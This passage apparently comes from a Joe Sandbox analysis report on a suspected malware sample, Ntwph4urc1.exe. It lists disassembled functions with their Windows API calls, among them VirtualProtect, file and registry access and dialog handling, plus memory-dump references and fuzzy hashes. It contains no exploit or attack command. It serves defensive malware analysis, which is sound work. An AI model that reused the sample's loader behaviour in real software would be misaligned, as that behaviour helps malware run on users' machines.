                                              Function 73F52AF8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileA.KERNELBASE(00000000), ref: 73F52BB7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: a417120420d47e1ee394fdcbe98c3372c4ebacfe28ed265696ecf188d6c489d2
                                              • Instruction ID: 99ce4daf79c0bc640d0bedc330ff963b08bbc4b3aa68e36c1ed967e1ffb7b6ea
                                              • Opcode Fuzzy Hash: a417120420d47e1ee394fdcbe98c3372c4ebacfe28ed265696ecf188d6c489d2
                                              • Instruction Fuzzy Hash: 41415CB390030AFFEB21AF65DDA4B5937B9EB443E4F348629F40FC6260D63595818B91
                                              Function 00405F67 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                              • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                              • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                              Function 00405F96 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                              • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                              • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                              Function 73F529DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNELBASE(73F5505C,00000004,00000040,73F5504C), ref: 73F529FD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                              • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 421e930dbfd403d93b2473739824ab8d392fa21a1d6320491f870a8e064a8fed
                                              • Instruction ID: 86f6ff497d27898c49da255001a5e3fc7c60d0f79578c726a4356b6fa34185d9
                                              • Opcode Fuzzy Hash: 421e930dbfd403d93b2473739824ab8d392fa21a1d6320491f870a8e064a8fed
                                              • Instruction Fuzzy Hash: 9AF0A5F3501382DEC350EF2A846470A3BE0B7083D4B34452AF19FD6261E3345044DF91
                                              Function 0040625B Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                              • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                              • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                              • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                              Function 00404390 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                              • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                              • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                              • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                              Function 0040345A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                              Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                              • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                              • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                              • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                              Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                              Download Yara Rule
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                              • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                              • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                              • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                              Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                              • Instruction ID: a18cf0c9a9b021ee27972f2e0a35f90bb7c2f66644072f7244457554decb08b2
                                              • Opcode Fuzzy Hash: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                              • Instruction Fuzzy Hash: 0AD05EB3A201008BC700DFB8BE8545E73B8EA903193308837D452E2091E6B889518629

                                              Non-executed Functions

                                              Function 00404835 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                              • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                              • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                              • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                              • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                                • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                                • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                • Part of subcall function 0040669D: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                              • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                                • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                                • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
